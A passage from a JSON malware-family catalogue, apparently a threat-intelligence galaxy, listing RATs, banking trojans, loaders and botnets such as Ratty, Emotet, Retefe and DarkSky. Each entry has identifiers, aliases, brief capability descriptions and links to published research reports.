"refs": [
"https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
"https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
"http://adelmas.com/blog/treasurehunter.php"
]
}
},
{
"uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b",
"value": "AlmaLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "da032a95-b02a-4af2-b563-69f686653af4",
"value": "Ratty",
"description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/shotskeber/Ratty"
]
}
},
{
"uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9",
"value": "Terminator RAT",
"description": "",
"meta": {
"synonyms": [
"Fakem RAT"
],
"type": [],
"refs": [
"https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
"https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf"
]
}
},
{
"uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
"value": "Connic",
"description": "",
"meta": {
"synonyms": [
"SpyBanker"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
]
}
},
{
"uuid": "87abb59d-0012-4d45-9e75-136372b25bf8",
"value": "Mikoponi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
"value": "FlexNet",
"description": "",
"meta": {
"synonyms": [
"gugi"
],
"type": [],
"refs": [
"https://twitter.com/LukasStefanko/status/886849558143279104"
]
}
},
{
"uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
"value": "Elise",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
"https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
"https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
"https://www.joesecurity.org/blog/8409877569366580427"
]
}
},
{
"uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b",
"value": "Heriplor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
"value": "XRat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.lookout.com/xrat-mobile-threat"
]
}
},
{
"uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
"value": "Roseam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/"
]
}
},
{
"uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
"value": "August Stealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene",
"https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html"
]
}
},
{
"uuid": "52932caa-2fac-4eeb-88de-b3e143db010e",
"value": "PvzOut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9",
"value": "Cutlet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
]
}
},
{
"uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41",
"value": "Qarallax RAT",
"description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/",
"https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/"
]
}
},
{
"uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f",
"value": "Boaxxe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/"
]
}
},
{
"uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e",
"value": "shareip",
"description": "",
"meta": {
"synonyms": [
"remotecmd"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
]
}
},
{
"uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6",
"value": "Virut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
"https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/"
]
}
},
{
"uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537",
"value": "KopiLuwak",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
"https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/"
]
}
},
{
"uuid": "9240ce4f-2c48-4e37-baaf-b8b9050c58f5",
"value": "Bahamut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
]
}
},
{
"uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95",
"value": "Aveo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/"
]
}
},
{
"uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0",
"value": "Fobber",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/",
"http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf",
"https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
"http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html",
"http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html"
]
}
},
{
"uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52",
"value": "Powersniff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://lokalhost.pl/gozi_tree.txt"
]
}
},
{
"uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428",
"value": "Nemim",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf"
]
}
},
{
"uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
"value": "Svpeng",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
]
}
},
{
"uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b",
"value": "NanoLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
"value": "WebC2-Head",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6",
"value": "Keydnap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
"https://github.com/eset/malware-ioc/tree/master/keydnap"
]
}
},
{
"uuid": "30a22cdb-9393-460b-86ae-08d97c626155",
"value": "Saphyra",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/",
"https://www.youtube.com/watch?v=Bk-utzAlYFI"
]
}
},
{
"uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
"value": "Geodo",
"description": "",
"meta": {
"synonyms": [
"Emotet",
"Heodo"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
"https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
"https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
"https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
"https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
"https://feodotracker.abuse.ch/?filter=version_e",
"https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
"http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1"
]
}
},
{
"uuid": "9fbb5822-1660-4651-9f57-b6f83a881786",
"value": "GovRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.yumpu.com/en/document/view/55930175/govrat-v20"
]
}
},
{
"uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a",
"value": "Molerat Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/iec/",
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf"
]
}
},
{
"uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa",
"value": "Snifula",
"description": "",
"meta": {
"synonyms": [
"Ursnif"
],
"type": [],
"refs": [
"https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf"
]
}
},
{
"uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52",
"value": "woody",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814"
]
}
},
{
"uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab",
"value": "Hi-Zor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat"
]
}
},
{
"uuid": "94466a80-964f-467e-b4b3-0e1375174464",
"value": "Hworm",
"description": "",
"meta": {
"synonyms": [
"houdini"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7",
"value": "Anel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/"
]
}
},
{
"uuid": "a61fc694-a88a-484d-a648-db35b49932fd",
"value": "Crimson",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
]
}
},
{
"uuid": "37f4fe10-96e4-4b3e-9159-80023270d3a6",
"value": "Retefe",
"description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
"http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
"http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
"http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/"
]
}
},
{
"uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0",
"value": "FlashBack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
"http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html"
]
}
},
{
"uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942",
"value": "FakeTC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2015/07/30/operation-potao-express/"
]
}
},
{
"uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a",
"value": "Matsnu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf"
]
}
},
{
"uuid": "da92c927-9b31-48aa-854a-8ed49a29565b",
"value": "Sierra(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [
"Destover"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
]
}
},
{
"uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6",
"value": "IISniff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
]
}
},
{
"uuid": "6ad84f52-0025-4a9d-861a-65c870f47988",
"value": "Stuxnet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html"
]
}
},
{
"uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
"value": "Tinba",
"description": "",
"meta": {
"synonyms": [
"Zusy",
"Illi",
"TinyBanker"
],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/",
"http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
"https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
"https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
"http://contagiodump.blogspot.com/2012/06/amazon.html",
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
"http://garage4hackers.com/entry.php?b=3086",
"http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
"http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/"
]
}
},
{
"uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb",
"value": "GrabBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data"
]
}
},
{
"uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7",
"value": "Duuzer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2",
"value": "MyloBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/"
]
}
},
{
"uuid": "a7489029-21d4-44c9-850a-8f656a98cb22",
"value": "Eye Pyramid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2017/01/Eye-Pyramid.html",
"https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/"
]
}
},
{
"uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
"value": "DarkPulsar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
]
}
},
{
"uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe",
"value": "GalaxyLoader",
"description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a",
"value": "StarsyPound",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394",
"value": "Moure",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13",
"value": "MacDownloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://iranthreats.github.io/resources/macdownloader-macos-malware/"
]
}
},
{
"uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989",
"value": "ISR Stealer",
"description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/"
]
}
},
{
"uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa",
"value": "DoublePulsar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
"https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
"https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
"https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
]
}
},
{
"uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a",
"value": "BBSRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
]
}
},
{
"uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d",
"value": "CenterPOS",
"description": "",
"meta": {
"synonyms": [
"cerebrus"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html"
]
}
},
{
"uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25",
"value": "Thanatos",
"description": "",
"meta": {
"synonyms": [
"Alphabot"
],
"type": [],
"refs": [
"https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market"
]
}
},
{
"uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5",
"value": "DtBackdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "eaf0afc1-de01-450f-86a1-12a93a3db256",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193",
"value": "SNS Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
"value": "WebC2-Rave",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
"value": "OddJob",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5ba66415-b482-44ff-8dfa-809329e0e074",
"value": "GROK",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf"
]
}
},
{
"uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
"value": "NETEAGLE",
"description": "",
"meta": {
"synonyms": [
"ScoutEagle"
],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
"value": "Enfal",
"description": "",
"meta": {
"synonyms": [
"Lurid"
],
"type": [],
"refs": [
"http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf",
"https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
"https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
]
}
},
{
"uuid": "2ae57534-6aac-4025-8d93-888dab112b45",
"value": "Sys10",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "ffd74637-b518-4622-939b-c0669a81f3a9",
"value": "Synth Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
"value": "MoonWind",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/"
]
}
},
{
"uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d",
"value": "Schneiken",
"description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
"https://github.com/vithakur/schneiken"
]
}
},
{
"uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c",
"value": "Lazarus ELF Backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990"
]
}
},
{
"uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
"value": "Neuron",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/turla-group-malware"
]
}
},
{
"uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7",
"value": "ZoxPNG",
"description": "",
"meta": {
"synonyms": [
"gresim"
],
"type": [],
"refs": [
"http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
]
}
},
{
"uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06",
"value": "Arik Keylogger",
"description": "",
"meta": {
"synonyms": [
"Aaron Keylogger"
],
"type": [],
"refs": [
"http://remote-keylogger.net/",
"https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/"
]
}
},
{
"uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc",
"value": "Bitsran",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
]
}
},
{
"uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4",
"value": "WebMonitor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
]
}
},
{
"uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b",
"value": "ISMDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/greenbug/",
"https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
]
}
},
{
"uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
"value": "Retefe",
"description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.",
"meta": {
"synonyms": [
"Werdlod",
"Tsukuba"
],
"type": [],
"refs": [
"https://github.com/cocaman/retefe",
"https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/"
]
}
},
{
"uuid": "606f778a-8b99-4880-8da8-b923651d627b",
"value": "PowerRatankba",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
]
}
},
{
"uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0",
"value": "Zebrocy (AutoIT)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
]
}
},
{
"uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb",
"value": "Darksky",
"description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://telegra.ph/Analiz-botneta-DarkSky-12-30",
"https://blog.radware.com/security/2018/02/darksky-botnet/",
"https://github.com/ims0rry/DarkSky-botnet"
]
}
},
{
"uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
"value": "NetTraveler",
"description": "",
"meta": {
"synonyms": [
"TravNet"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
"https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf"
]
}
},
{
"uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2",
"value": "Crypt0l0cker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html"
]
}
},
{
"uuid": "aa445513-9616-4f61-a72d-7aff4a10572b",
"value": "Empire Downloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/thor_scanner/status/992036762515050496"
]
}
},
{
"uuid": "83c3aacc-4d13-4ce2-aced-f11b03f12efe",
"value": "win.flusihoc",
"description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/"
]
}
},
{
"uuid": "4db94d24-209a-4edd-b175-3a3085739b94",
"value": "Colony",
"description": "",
"meta": {
"synonyms": [
"Bandios",
